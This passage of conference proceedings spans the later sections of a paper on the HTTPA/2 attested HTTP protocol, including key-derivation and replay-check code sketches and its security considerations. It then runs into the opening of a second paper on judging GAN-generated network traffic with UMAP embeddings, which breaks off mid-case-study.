It contains a set of signatures, which are used to ensure the IntAuth of the AHLs in this AtR through a client-side signing key (see Sect. 2.5).
iv. Attest-Transport
As described in Sect. 2.8, the client HELLO message should be put here. With this, the TService can enforce a trustworthy and secure connection at L5, which is somewhat similar to what HTTP Strict Transport Security (HSTS) does [12].
(b) AHFs in response message
i. Attest-Version
It shows the client which version of HTTPA the TService has selected.
ii. Attest-Transport
Similarly, the TService returns its HELLO message to the client for a secure transport layer handshake.
iii. Attest-Expires
It indicates when the allocated AtB will expire and its related resources will be released. It provides another layer of security to reduce the chance of this AtB being attacked.
iv. Attest-Secrets
It is an ordered list of AtB-wide secrets, which are provisioned by the TService if the client expects them. This can save the RTT of AtSP (see Sect. 3.3) if the TService does not demand secrets from the client immediately.
v. Attest-Cargo
The usage of this field is described in Sect. 2.7. Note that “Attest-Cargo” is an AHF, while the TrC is the corresponding content, which plays an important role in sensitive data encryption and authentication.
Apart from the tasks above, this AtR can act as a GET request, but it cannot be trusted because the key exchange is incomplete at this moment, which means it cannot contain any sensitive data. Its response, however, can be trusted, as the key exchange process is completed on the TService side before the response is returned. Therefore, TService-side sensitive data can be safely transmitted back to the client through the TrC.
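The key derivation step of this phase, in which HKDF incorporates both the input secrets and the AHLs of the handshake, can be sketched with the Python standard library. HKDF-Extract and HKDF-Expand follow RFC 5869 with SHA-256; everything else is an assumption made for illustration: the function `derive_keys`, the labels `httpa2 c key` and `httpa2 s key`, the use of the two Attest-Random values as the salt, and the use of a hash over the handshake AHLs as context are not defined by the paper. The ECDHE shared secret is taken as an input, since computing it requires a cryptographic library outside the standard library.

```python
import hashlib
import hmac

HASH_LEN = 32  # output size of SHA-256 in bytes


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """HKDF-Extract (RFC 5869): derive a pseudorandom key from the input secret."""
    return hmac.new(salt or b"\x00" * HASH_LEN, ikm, hashlib.sha256).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """HKDF-Expand (RFC 5869): expand the pseudorandom key to `length` bytes."""
    if length > 255 * HASH_LEN:
        raise ValueError("requested output is too long for HKDF")
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]


def derive_keys(shared_secret: bytes, client_random: bytes,
                server_random: bytes, ahl_hash: bytes) -> dict[str, bytes]:
    """Derive per-direction keys bound to the randoms and the handshake AHLs."""
    # Assumption: both Attest-Random values are concatenated to form the salt.
    prk = hkdf_extract(client_random + server_random, shared_secret)
    # Assumption: hypothetical labels; the AHL hash ties the keys to this handshake.
    return {
        "client_key": hkdf_expand(prk, b"httpa2 c key" + ahl_hash, 32),
        "server_key": hkdf_expand(prk, b"httpa2 s key" + ahl_hash, 32),
    }
```

Because the hash of the handshake AHLs enters the derivation, a client and a TService that saw different AHLs end up with different keys, so tampering with the handshake surfaces as a failure to authenticate the first protected message.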
3.3 Attest Secret Provisioning (AtSP) Phase
As mentioned in Sect. 3.2, the main purpose of AtSP is to securely deliver secrets to a trustworthy AtB, which has been verified by a server-side verifier. The AtR of AtSP is intended for this purpose. To be precise, it is for AtB-wide and client-wide secret provisioning. In contrast, request-wide or response-wide secrets should be carried by the TrCs (see Sect. 2.7) of HTTPA/2 transactions. In addition, a failure of AtSP causes immediate termination of the AtB.

Fig. 3. Attest secret provisioning (AtSP) transaction

As shown in Fig. 3, the AtSP transaction can be used to provision secrets in both directions, since the AtB and its key materials have already been derived through AtHS (see Sect. 3.2) on both sides; thus, the AHLs can be fully protected during this phase. Moreover, the AtR of AtSP can be issued by the client any number of times at any time after AtHS. The AHLs are described as follows:

1. AHFs in request message (or AtR)
(a) Attest-Base-ID: This identifier specifies which AtB is targeted to handle this AtR of AtSP. With this ID, the TService can first validate it against its serving list to make sure the request is handled correctly (see 4.2 in Fig. 3). However, the TService should quietly ignore the request if the ID is not valid for its residing AtB, as the receiving TService should not expose any information that an adversary could exploit.
(b) Attest-Ticket: The usage of this field is explained in Sect. 2.5. The value of this field must be unique to prevent replay attacks. It also ensures the IntAuth of the AHLs in this request.
(c) Attest-Secrets: An ordered list of secrets, wrapped by means of AE as a standard way of providing strong protection. Each secret should be referable later by the client through its index, for example to specify the provisioned secret used to decrypt embedded sensitive data. Again, the receiving AtB should be terminated if any of these provisioned secrets cannot be validated or accepted by the AtB (see 4.3 in Fig. 3).
(d) Attest-Cargo: This field is optional. It can be used to carry any sensitive information that is meaningful to the TService (see Sect. 2.7). Note that this paper does not define the structure of its content, which could be addressed in a separate paper.

2. AHFs in response message
(a) Attest-Binder: Binds the request and the response together so that this transaction is identified uniquely (see Sect. 2.6).
(b) Attest-Secrets: The wrapped secrets contained in this header field are provisioned back to the client. As noted earlier, this can be merged into the response AHLs of the AtR of AtHS (see Sect. 3.2).
(c) Attest-Cargo: Similarly, it can be used to carry sensitive information or data back to the client (see Sect. 2.7).

3.4 Trusted Communication Phase
Fig. 4. Trusted transaction
Once an AtB has been allocated for the client, the client can subsequently issue TrRs (see Sect. 2.4) to do the real work. Basically, a TrR is an ordinary HTTP request with some extra AHLs, which are described in detail as follows:

1. AHFs in request message
(a) Attest-Base-ID: Specifies which AtB is to handle this request. It should be validated by the target TService (see 5.2 in Fig. 4) before the request is processed (see 5.3 in Fig. 4).
(b) Attest-Ticket: This field, explained above (see Sect. 2.5), is intended to authenticate this request and to prevent the other AHLs from being tampered with or replayed.
(c) Attest-Cargo: As noted earlier, this field is optional; the client can use it to transfer arbitrary sensitive information to the TService (see Sect. 2.7).
(d) Attest-Base-Termination: This AHF can be included if this is the last TrR sent to the AtB. It is the recommended way to actively terminate an AtB. The termination method can be one of the following options:
    Cleanup: The terminated AtB can be reused by other clients.
    Destroy: Specify this method if the AtB should not be reused or shared by any other clients.
    Keep: This allows the AtB to be shared with other clients. Be careful: this method is less safe, as residual data could be exploited and leaked to the next client, if any.

2. AHFs in response message
(a) Attest-Binder: As explained earlier, HTTPA/2 uses it to ensure the IntAuth of the request and response together (see Sect. 2.6).
(b) Attest-Cargo: As noted earlier, the TService can leverage this mechanism to transfer arbitrary sensitive information back to its client (see Sect. 2.7).
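As an illustration of the fields above, the following sketch assembles the AHFs of a final TrR. The field names come from the list above, but the value formats, the lower-case method tokens, and the helper name `build_trr_headers` are hypothetical, since this section does not define a wire encoding.

```python
from enum import Enum
from typing import Dict, Optional


class Termination(Enum):
    """Termination methods listed for Attest-Base-Termination."""
    CLEANUP = "cleanup"   # the AtB can be reused by other clients
    DESTROY = "destroy"   # the AtB must not be reused or shared
    KEEP = "keep"         # the AtB stays shared; residual data is a risk


def build_trr_headers(base_id: str, ticket: str,
                      cargo: Optional[str] = None,
                      termination: Optional[Termination] = None) -> Dict[str, str]:
    """Collect the AHFs of a trusted request (TrR) into a header mapping."""
    headers = {"Attest-Base-ID": base_id, "Attest-Ticket": ticket}
    if cargo is not None:            # Attest-Cargo is optional
        headers["Attest-Cargo"] = cargo
    if termination is not None:      # only on the last TrR towards the AtB
        headers["Attest-Base-Termination"] = termination.value
    return headers


# Placeholder values; real tickets and cargo are produced cryptographically.
last_request = build_trr_headers("base-123", "ticket-placeholder",
                                 termination=Termination.DESTROY)
```

Modelling the termination method as an enumeration keeps the three options explicit and makes it harder to send an unsupported value by accident.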
3.5 Protocol Flow
Fig. 5 illustrates these transactions from the client's perspective, including preflight, AtHS, AtSP, and trusted requests, in a workflow diagram. In the design of HTTPA/2, only the AtHS phase is required, which not only greatly simplifies the interaction between the client and the TService but also improves the user experience (UX).
Figure 6 shows the corresponding workflow on the TService side, which helps explain how these transactions are distinguished in the TService.
Fig. 5. HTTPA transaction workflow from the client view
Fig. 6. HTTPA transaction workflow from the TService view
4 Security Considerations
In this section, we discuss the security properties and potential vulnerabilities that are necessary for understanding HTTPA/2.

4.1 Layer 7 End-to-End Protection
In cloud computing scenarios, intermediary nodes, such as L7 load balancers or reverse proxies, are commonly used to improve network performance and deliver the best web experience. However, this web experience does not come for free. Secure communication based on TLS only protects transmitted data hop-by-hop at layer 5 (L5). The intermediary nodes may need TLS termination to inspect HTTP messages in plain text for better network performance. As a consequence, the intermediary nodes can read and modify any HTTP information at L7. Although TLS itself is not the problem, it cannot protect sensitive information above L5, where most Web services are located. This gap between L5 and L7 causes the underlying vulnerability. Therefore, a trust model that includes intermediary nodes operating above L5 is problematic [23] because, in reality, intermediary nodes are not necessarily trustworthy. Intermediary nodes may leak private information and manipulate the header lines of HTTP messages. Even when intermediaries are fully trusted, an attacker may exploit the vulnerability of the hop-by-hop architecture, leading to data breaches. HTTPA/2 helps protect the AHLs and the sensitive information of HTTP messages end-to-end at L7. As long as the protection does not encrypt information that proxy operations need [23], HTTPA/2 can provide guarantees that the protected message survives across middleboxes to reach the endpoint. In particular, HTTPA/2 provides an encryption mechanism at the level of the HTTP message, in which only selected information, such as some header lines or payloads, is encrypted rather than the entire message. Thus, the unprotected parts of the HTTPA information may be exploited for spoofing or manipulation. If every bit of an HTTPA message needs to be protected hop-by-hop, using TLS in combination with HTTPA/2 is highly recommended. In an implementation, TServices can define a privacy policy that determines to what degree the HTTPA message is protected up to the L7 endpoint without TLS, for better network performance. If the entire message is highly sensitive, TLS can help in addition, but only up to the security of the L5 hop point.

4.2 Replay Protection
Replay attacks should be considered in both design and implementation. To mitigate replay attacks, most AEAD algorithms require a unique nonce for each message. In AtR, random numbers are used. In TrR, a sequential nonce is used by each endpoint. Assuming the numbers in the sequence are strictly increasing, a replay attack can easily be detected if any received number is a duplicate or is not larger than the previously received number. For reliable transport, the policy can be to accept only a TrR whose nonce equals the previous number plus one.
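The nonce check for TrR described above can be sketched as follows. This is a minimal illustration under stated assumptions: the class name `NonceChecker`, the use of plain integers, and the choice to accept any first nonce are hypothetical, since the nonce encoding and its initial value are not specified here.

```python
from typing import Optional


class NonceChecker:
    """Tracks the last accepted TrR nonce for one AtB and rejects replays.

    strict=False accepts any nonce larger than the last one (gaps allowed);
    strict=True accepts only last + 1, the policy for reliable transport.
    """

    def __init__(self, strict: bool = False) -> None:
        self.strict = strict
        self.last: Optional[int] = None  # no nonce accepted yet

    def accept(self, nonce: int) -> bool:
        if self.last is not None:
            if nonce <= self.last:                      # duplicate or stale
                return False
            if self.strict and nonce != self.last + 1:  # unexpected gap
                return False
        self.last = nonce
        return True


checker = NonceChecker()
results = [checker.accept(n) for n in (1, 2, 2, 5, 4)]
# results == [True, True, False, True, False]
```

A rejected nonce leaves the stored value unchanged, so a replayed message cannot move the window forward.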
4.3 Downgrade Protection
The cryptographic configuration parameters should be the same for both parties as if no attacker were present between them. We should always negotiate the preferred common parameters with the peer. If the negotiated configuration parameters differ between the two parties, the peers could end up using a weaker cryptographic mode than the one they should use, which leads to a potential downgrade attack [7]. In HTTPA/2, the TService uses AtQ to authenticate its identity and the integrity of the AtHS to the client. In mHTTPA/2, the client uses the AtQ carried by the AtR to prove its own authenticity and the integrity of the message. Thus, the handshake traffic crossing intermediaries cannot be compromised by attackers.

4.4 Privacy Considerations
HTTPA/2 considerably reduces privacy threats across intermediary nodes. End-to-end integrity protection and encryption of the HTTPA/2 AHLs and payloads, applied in a way that does not block proxy operations, help mitigate attacks on the communication between the client and the TService. On the other hand, the parts of the HTTP headers and payloads that are intentionally left unprotected may reveal information related to the sensitive, protected parts, and privacy may then be leaked. For example, the HTTP message fields visible to on-path entities are used only to transport the message to the endpoint, whereas the AHLs and their bound payloads are encrypted or signed. Attackers may still exploit the visible parts of HTTP messages to infer the encrypted information if the privacy-preserving policy is not set up well. Unprotected error messages can reveal information about the security state of the communication between the endpoints. Unprotected signaling messages can reveal information about reliable transport. The length of HTTPA/2 message fields can reveal information about the message. The TService may use a padding scheme to protect against traffic analysis. Overall, HTTPA/2 provides a new dimension for applications to further protect privacy.

4.5 Roots of Trust (RoT)
Many security mechanisms are currently rooted in software; however, we have to trust the underlying components, including software, firmware, and hardware. A vulnerability in these components could easily be exploited to compromise the security mechanisms once the RoT is broken. One way to reduce this risk is to choose a highly reliable RoT. A RoT consists of trusted hardware, firmware, and software components that perform specific, critical security functions [4]. A RoT is supposed to be trusted and more secure, so it is usually used to provide strong assurances for the desired security properties. In HTTPA/2, the inherent RoT is the AtB or TEEs, which provide a firm foundation on which to build security and trust. With AtB being used in HTTPA/2, we believe that the risks to security and privacy can be greatly reduced.
5 Conclusion
In this paper, we propose the HTTPA/2 protocol, a major revision of HTTPA/1. HTTPA/2 is a layer 7 protocol that builds trusted end-to-end communication between Hypertext Transfer Protocol (HTTP) endpoints. An integral part of HTTPA/2 is based on confidential computing, e.g., TEEs, which is used to build verifiable trust between endpoints with remote attestation. Communication between trusted endpoints is better protected across intermediary nodes, which may not have TLS protection. This protection helps prevent HTTPA/2 metadata and the selected HTTP data from being compromised by internal attackers, even with TLS termination. In addition to its security advantages, HTTPA/2 also offers performance advantages over HTTPA/1: because enforcing TLS is not mandatory, the overhead of TLS can be saved. Furthermore, HTTPA/2 gives a service provider the flexibility to decide which parts of the HTTP message need to be protected. This feature can potentially be leveraged by CSPs to optimize their networking configuration and service deployment in order to improve throughput and response time. With those improvements, electrical energy can be saved as well.
6 Future Work
To further realize HTTPA/2 in the real world, we will focus on a proof-of-concept (PoC) to demonstrate its validity and soundness. We will apply the PoC code of HTTPA/2 to various use cases in practice. Lastly, we plan to release a generalized reference implementation as open source. In the future, we expect emerging private AI applications to leverage HTTPA/2 to deliver end-to-end trusted services for processing sensitive data and protecting model IP. HTTPA/2 will enable Trust-as-a-Service (TaaS) for a more trustworthy Internet. With HTTPA/2 and TaaS, Internet users will have the freedom to choose what to trust, the right to verify assurances, and the right to know the verified details. Users can make their decisions of their own free will, based on faithful results that they consider and choose to believe. It becomes possible to build genuine trust between two endpoints. Thus, we believe that HTTPA/2 will accelerate the transformation towards a trustworthy Internet for a better digital world.
7 Notices and Disclaimers
No product or component can be absolutely secure.

Acknowledgments. We would like to acknowledge the support from the HTTPA workgroup members, including our partners and reviewers. We thank them for their valuable feedback and suggestions.
References

1. Execution environments
2. Innovative technology for CPU based attestation and sealing
3. Remote attestation
4. Roots of trust (RoT)
5. Backman, A., Richer, J., Sporny, M.: HTTP message signatures draft-ietf-httpbis-message-signatures-08. Technical report, Internet-Draft. IETF (2019). https://www.ietf.org/archive/id/draft-ietf-httpbis-message-signatures-08.html
6. Banks, A.S., Kisiel, M., Korsholm, P.: Remote attestation: a literature review. CoRR, abs/2105.02466 (2021)
7. Bhargavan, K., Brzuska, C., Fournet, C., Green, M., Kohlweiss, M., Zanella-Béguelin, S.: Downgrade resilience in key-exchange protocols. In: 2016 IEEE Symposium on Security and Privacy (SP), pp. 506–525. IEEE (2016)
8. Birkholz, H., Thaler, D., Richardson, M., Pan, W., Smith, N.: Remote attestation procedures architecture draft-ietf-rats-architecture-12. Technical report, Internet-Draft. IETF (2021). https://www.ietf.org/archive/id/draft-ietf-rats-architecture-12.html
9. Fielding, R.T., Reschke, J.: Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing. RFC 7230, June 2014
10. Fielding, R.T., Reschke, J.: Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content. RFC 7231, June 2014
11. Helble, S.C., Kretz, I.D., Loscocco, P.A., Ramsdell, J.D., Rowe, P.D., Alexander, P.: Flexible mechanisms for remote attestation. ACM Trans. Priv. Secur. 24(4), 1–23 (2021)
12. Hodges, J., Jackson, C., Barth, A.: HTTP Strict Transport Security (HSTS). RFC 6797, November 2012
13. Jauernig, P., Sadeghi, A.-R., Stapf, E.: Trusted execution environments: properties, applications, and challenges. IEEE Secur. Priv. 18(2), 56–60 (2020)
14. King, G., Wang, H.: HTTPA: HTTPS attestable protocol (2021)
15. Krawczyk, H., Eronen, P.: HMAC-based Extract-and-Expand Key Derivation Function (HKDF). RFC 5869, May 2010
16. Krawczyk, H.: SIGMA: the ‘SIGn-and-MAc’ approach to authenticated Diffie-Hellman and its use in the IKE protocols. In: Boneh, D. (ed.) CRYPTO 2003. LNCS, vol. 2729, pp. 400–425. Springer, Heidelberg (2003). https://doi.org/10.1007/978-3-540-45146-4_24
17. Langley, A., Hamburg, M., Turner, S.: Elliptic Curves for Security. RFC 7748, January 2016
18. McGrew, D.: An Interface and Algorithms for Authenticated Encryption. RFC 5116, January 2008
19. Ménétrey, J., Göttel, C., Pasin, M., Felber, P., Schiavoni, V.: An exploratory study of attestation mechanisms for trusted execution environments (2022)
20. Nir, Y., Josefsson, S., Pégourié-Gonnard, M.: Elliptic Curve Cryptography (ECC) Cipher Suites for Transport Layer Security (TLS) Versions 1.2 and Earlier. RFC 8422, August 2018
21. Nottingham, M., Kamp, P.-H.: Structured Field Values for HTTP. RFC 8941, February 2021
22. Rescorla, E.: The Transport Layer Security (TLS) Protocol Version 1.3. RFC 8446, August 2018
23. Selander, G., Mattsson, J.P., Palombini, F., Seitz, L.: Object Security for Constrained RESTful Environments (OSCORE). RFC 8613, July 2019
Qualitative Analysis of Synthetic Computer Network Data Using UMAP
Pasquale A. T. Zingo and Andrew P. Novocin
University of Delaware, Newark, DE, USA
[email protected]
Abstract. Evaluating the output of Generative Adversarial Networks (GANs) trained on computer network traffic data is difficult. In this paper, we introduced a strategy using fixed low-dimensional UMAP embeddings of network traffic to compare source and synthetic network traffic qualitatively. We found that UMAP embeddings gave a natural way to evaluate the quality of generated data and infer the fitness of the generating model’s hyperparameters. Further, this evaluation matches with quantitative strategies such as GvR. This strategy adds to the toolbox for evaluating generative methods for network traffic and could be generalized to other tabular data sources which are not easily evaluated.

Keywords: Computer network traffic · Generative adversarial network · GvR · UMAP

1 Introduction

1.1 Problem Statement
Evaluating Generative Adversarial Networks for computer network traffic data is difficult, and the leading strategies focus on quantitative point estimates of the quality of generated traffic. There is currently a lack of strategies for evaluating entire synthetic datasets for quality and accuracy with respect to the source datasets. GANs thrive in the image domain, where humans can quickly evaluate the quality of generated data, so the authors seek to create high-quality visualizations of generated data to enable faster iteration on GAN design in the computer network traffic domain.

1.2 Motivation
Labeled network traffic is necessary for computer network security training simulations (such as cyber ranges) and for training Network Intrusion Detection Systems (NIDS) based on Machine Learning (ML) technologies. Because recording and labeling network traffic from real networks is expensive and time-consuming and creates risk for the source organization, attempts have been made to synthesize computer network traffic. In addition to simulation strategies that create computer networks and script high-level behavior to generate traffic datasets, generative data methods have been implemented in the traffic domain. Some of these methods use Generative Machine Learning (GML) models such as Generative Adversarial Networks (GANs) and Variational Autoencoders (VAEs). These models have several benefits: they are largely automated in tuning a generator to an existing source dataset, and they have shown great success in the image domain, for which they were primarily designed. However, the output of GML models for the image domain can easily be evaluated by humans, who are experts at judging the quality of images and determining whether they look natural. In computer network traffic and other tabular data domains, the appropriateness of synthetic data is not easy to determine.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023
K. Arai (Ed.): FICC 2023, LNNS 652, pp. 849–861, 2023. https://doi.org/10.1007/978-3-031-28073-3_56

1.3 Proposed Solution
While many proposed solutions offer point-estimate metrics for the appropriateness of generated network traffic along given dimensions of interest, evaluation remains difficult. In this work we take a holistic approach to generated data by bringing it back into the image domain through the use of UMAP embeddings. UMAP is a dimension reduction technique, used here for its ability to generate a reusable embedding that can visualize data other than its training set. Our strategy is to identify a useful projection of the source dataset, then project the synthetic data into the same space and evaluate the appropriateness of the synthetic data by visual inspection. Here we assume that synthetic data which reflects the distribution of traffic from a real source will be projected into similar parts of the embedded space. The validity of this assumption is addressed in Sect. 5.

1.4 Paper Roadmap
Section 2 covers background details regarding the current state of network traffic GANs and their evaluation techniques, as well as the CTGAN model and the UMAP tool used in this work. Section 3 details the methodology proposed in this paper, and Sect. 4 presents an implementation that illustrates the methodology. Section 5 discusses the results of Sect. 4, and in Sect. 6 we speculate on ways to further improve and explore this methodology.
2 Background and Literature Review

2.1 Computer Network Traffic and Classification
This work focuses on the computer network traffic domain, with specific interest in how this data can be applied to Intrusion Detection Systems (IDS) powered by Machine Learning (ML). IDS are systems that monitor network traffic and determine for each packet, flow, etc. whether its behavior is malicious. This problem grows in importance as the size of networks and the number of bad actors increase, and it is further complicated by the changing environment of attacks and attack surfaces. Ideally, IDS should adapt quickly as new data is recorded and attacks are detected. In practice, most IDS are hand-crafted by experts on the attacks and risks to a specific system. ML has shown success in classifying traffic for well-known traffic datasets, but most public datasets are out of date, small, or simulated. Some reasons for the insufficiency of existing datasets are:

– Releasing real, high-quality traffic data poses a security risk to the institution that created it. Credentials, trade secrets, and personally identifying information of employees are all put at risk by publishing traffic data.
– Accurate labeling of traffic data is expensive. In a simulated environment, the class of traffic is known before the traffic is created, making labeling trivial. In a real environment, however, experts must label traffic according to rules, or else by inspection. For datasets with millions of observations, this is prohibitive.

A proposed solution is to use Generative Machine Learning to capture the significant patterns in real traffic data and to generate observations that do not exist in the original dataset but come from the same distribution, while guaranteeing some degree of anonymization of the underlying dataset. While promising, this strategy has some current limitations.

2.2 Generative Machine Learning
GANs for Image Data. Among algorithms in Generative Machine Learning, Generative Adversarial Networks (GANs) and their variants are currently the state of the art. GANs were introduced to create realistic image data by learning the distribution of an existing image dataset and sampling from it. Since their introduction in 2014, image GANs have quickly improved to generate many kinds of data and can create photorealistic images [2].

GANs for Traffic Data. Several attempts have been made to generate network traffic data with GANs. In [4], traffic flows were generated using WGAN-GP [3] trained on data from a simulated internal network. In [1], the first 784 bits of packets were generated from 3 classes of simple network requests (ping, etc.).

2.3 Synthetic Traffic Evaluation
Schoen et al. [5] introduced a taxonomy for network traffic GAN evaluation according to 4 goals for the traffic:

– Realism (fidelity): The sample should follow the same distribution as the real data.
– Diversity (fairness): Generated samples should have the same variation as real data.
– Originality (authenticity): Generated samples should be sufficiently different from the real samples.
– Compliance: Samples that could not exist according to the constraints of the real system should never be generated.

The authors note that the criteria Realism and Originality are at odds. We add that, for applications where the privacy of the underlying data is important, Originality becomes more important. Below, we discuss the existing strategies for Traffic-GAN evaluation.

Fig. 1. The GvR metric construction diagram.

Domain Knowledge Check. Domain Knowledge Checks (DKCs) measure the Compliance of the generated traffic. In [4], synthetic flows were evaluated according to several system-constraint rules that followed from the original dataset, such as:

– If the transport protocol is UDP, then the flow must not have any TCP flags.
– The CIDDS-001 data set is captured within an emulated company network. Therefore, at least one IP address (source IP address or destination IP address) of each flow must be internal (starting with 192.168.XXX.XXX).
– If the flow describes normal user behavior and the source port or destination port is 80 (HTTP) or 443 (HTTPS), the transport protocol must be TCP.
– If the flow describes normal user behavior and the source port or destination port is 53 (DNS), the transport protocol must be UDP.
– If a multi- or broadcast IP address appears in the flow, it must be the destination IP address.

DKCs insist that the generated data could have occurred in the source network, but they do not ensure any degree of variation in data generation. A trivial generator that only reproduces a single sample memorized from the source dataset would pass such DKCs with 100% accuracy but would fail any check based on Realism, Diversity, or Originality.

Fig. 2. The MNIST digits dataset embedded with UMAP.

Traffic Viability. In [1], the results were evaluated according to the success rate of the generated packets being sent across a network. As in [4], this is a measure of Compliance, and the same trivial generator would defeat this evaluation technique without having to learn the generating distribution.

GAN vs Real (GvR). The GvR metric was introduced in [8] (see Fig. 1). GvR is a general quantitative strategy for evaluating Traffic GANs. Under GvR, a classifier C_R is trained on the real dataset, and another classifier C_S with identical hyperparameters is trained on the synthetic output of a generative model trained on the real data. Both C_R and C_S are used to predict on data d held out from the full dataset, and the difference in score, C_R(d) − C_S(d), is the “GvR score”. The accuracy of the real classifier is expected to be greater than that of the synthetic classifier, in which case the score will be positive. The more accurately the generative model captures the real dataset, the better the synthetic classifier will perform, and so the smaller the GvR score becomes.
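The GvR computation described above can be sketched as follows. This is an illustration under assumptions rather than the reference implementation from [8]: the names `gvr_score`, `accuracy`, and `MajorityClassifier` are hypothetical, accuracy is assumed as the score, and the toy majority-label classifier only stands in for a real model so that the sketch runs without third-party packages.

```python
from collections import Counter
from typing import Any, Callable, Hashable, Sequence


class MajorityClassifier:
    """Toy stand-in classifier: always predicts the most common training label."""

    def fit(self, X: Sequence, y: Sequence[Hashable]) -> "MajorityClassifier":
        self.label_ = Counter(y).most_common(1)[0][0]
        return self

    def predict(self, X: Sequence) -> list:
        return [self.label_ for _ in X]


def accuracy(y_true: Sequence, y_pred: Sequence) -> float:
    """Fraction of predictions that match the true labels."""
    return sum(t == p for t, p in zip(y_true, y_pred)) / len(y_true)


def gvr_score(make_classifier: Callable[[], Any],
              real, synthetic, held_out) -> float:
    """GvR = accuracy of C_R minus accuracy of C_S on the same held-out data.

    Each dataset is an (X, y) pair; make_classifier returns a fresh,
    identically configured classifier on every call.
    """
    c_real = make_classifier().fit(*real)        # C_R, trained on real data
    c_synth = make_classifier().fit(*synthetic)  # C_S, trained on synthetic data
    X_held, y_held = held_out
    return (accuracy(y_held, c_real.predict(X_held))
            - accuracy(y_held, c_synth.predict(X_held)))


real = ([[0], [1], [2]], ["a", "a", "b"])
synthetic = ([[0], [1], [2]], ["b", "b", "a"])
held_out = ([[3], [4], [5], [6]], ["a", "a", "a", "b"])
score = gvr_score(MajorityClassifier, real, synthetic, held_out)  # 0.75 - 0.25
```

With scikit-learn installed, a factory such as `lambda: RandomForestClassifier(random_state=0)` could be passed instead, since its `fit` returns the estimator and its `predict` takes the feature matrix.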
2.4 CTGAN
CTGAN [7] was introduced in 2019. While most GANs are designed to work with image data and its underlying assumptions (continuous values, the insignificance of small perturbations of value, the relationship between adjacent values), CTGAN is optimized to work on tabular and categorical data. This better reflects the assumptions necessary for computer network traffic data, and so CTGAN is used in the case study below.

2.5 UMAP Embedding
Uniform Manifold Approximation and Projection (UMAP) is a recent strategy for representing clusters of high-dimensional data in 2 dimensions that balances 2 concerns when embedding (see Fig. 2):

– Similar points should be within the same cluster.
– The distance between clusters should correspond to similarity.

This strategy has been used previously in [6] as a preprocessing step before clustering traffic to detect traffic anomalies.
3 Proposed Methodology
Given a source dataset D and a generative model G_D trained on that dataset:

1. Train a UMAP embedding U_real on D.
2. Generate the visualization V_real of D under U_real.
3. Sample G_D to create a synthetic dataset D_synthetic.
4. Generate the visualization V_synthetic of D_synthetic under U_real.
5. Compare V_real with V_synthetic.
As an alternative to the last step, compare the embeddings of multiple generators to determine which one performs best under the UMAP embedding trained on the real data.
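The fit-once, transform-many workflow of the steps above can be sketched as follows. The sketch is illustrative only: `embed_for_comparison` and `FirstTwoColumnsReducer` are hypothetical names, and the reducer is a trivial stand-in (not a real dimension reduction method) that merely exposes the `fit`/`transform` interface so that the example runs without third-party packages.

```python
from typing import List, Sequence, Tuple

Point = Tuple[float, float]


class FirstTwoColumnsReducer:
    """Stand-in for UMAP: centers on the fitted data, keeps two columns.

    Only here so the sketch runs without third-party packages; it is not
    a real dimension reduction method.
    """

    def fit(self, rows: Sequence[Sequence[float]]) -> "FirstTwoColumnsReducer":
        n = len(rows)
        self.means_ = [sum(r[j] for r in rows) / n for j in (0, 1)]
        return self

    def transform(self, rows: Sequence[Sequence[float]]) -> List[Point]:
        return [(r[0] - self.means_[0], r[1] - self.means_[1]) for r in rows]


def embed_for_comparison(reducer, real, synthetic):
    """Steps 1-4: fit on real data only, then project both datasets."""
    reducer.fit(real)                       # U_real is learned from D alone
    v_real = reducer.transform(real)        # coordinates behind V_real
    v_synth = reducer.transform(synthetic)  # same embedding, new data
    return v_real, v_synth


real = [[0.0, 0.0, 5.0], [2.0, 4.0, 5.0]]
synthetic = [[1.0, 2.0, 9.0]]
v_real, v_synth = embed_for_comparison(FirstTwoColumnsReducer(), real, synthetic)
```

With the umap-learn package installed, a `umap.UMAP(n_components=2)` object could be passed as `reducer`, since it also exposes `fit` and `transform`; the two returned coordinate sets would then be drawn as scatter plots for the visual comparison in step 5.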
Fig. 3. The real embedded packets used to fit the UMAP embedding.
4 Case Study

4.1 Plan
In this case study, we demonstrate the variation of embedded data under a fixed UMAP embedding fit to real data, as well as the behavior of synthetic data under that embedding. Our goal is to determine whether a UMAP embedding fit to real data can helpfully distinguish among synthetically generated data of varying quality. For the UMAP embedding to be helpful, we require that the embedded samples of a well-trained generator closely resemble the embedding of real data, and that the embedding of a poorly trained generator's samples degrade significantly. On the latter point, we note that if the embedding maintains its structure regardless of the quality of the data (e.g., when embedding random noise), then UMAP is not sensitive enough for this task.

4.2 Data Preparation
For this experiment, a Social Media Network Packet dataset¹ was used. Duplicate packets were removed, and only header features were used, resulting in a dataset of 213,029 observations with 12 features, one of which is the 'Label'. This Label feature was one-hot encoded for embedding, resulting in 17 features passed to UMAP. The Labels indicate which social media service the packets were associated with:

– Viber
– WhatsApp
– Twitter
– Skype
– Telegram
– Other (unlabeled)

Due to speed limitations, 2,000 packets from each class were randomly sampled for each run, giving a dataset of 12,000 packets for fitting and an additional 12,000 packets for validation. Generators were sampled in the same proportion, so that each image contains a balanced sample of the 5 classes as well as the 'Other'/noise class.

¹ This dataset was provided by the U.S. Army CCDC, C5ISR Center. For information contact Metin Ahiskali ([email protected]).

4.3 Generators
Two generator types are used in this experiment:

1. The Empirical Distribution of the dataset
2. CTGAN

Data sampled according to the Empirical Distribution of the dataset only carries information about the distribution of each feature independently; any relationships between features are lost. This method is used as a naive generator to test whether a poorly parameterized generator shows clear deviations from the real embedded data. CTGAN is designed specifically for tabular datasets and is used here as a sophisticated generator. Given a good parameterization, it should generate data very similar to the original dataset, which in turn should be reflected in its transformation under the UMAP embedding.

4.4 Real Data is Embedded
A UMAP model is fit to the real data sample; the resulting transformation can be seen in Fig. 3. This embedding is used again to transform the held-out real sample of the same size in Fig. 4, which shows slight variation from Fig. 3 but has identical structure. If a generator models the generating distribution perfectly, we would expect its output under this transformation to show approximately the same amount of variation from Fig. 3 as is present in Fig. 4.
Fig. 4. More real packets from the same dataset as Fig. 3 under the same embedding
4.5 Synthetic Data is Embedded
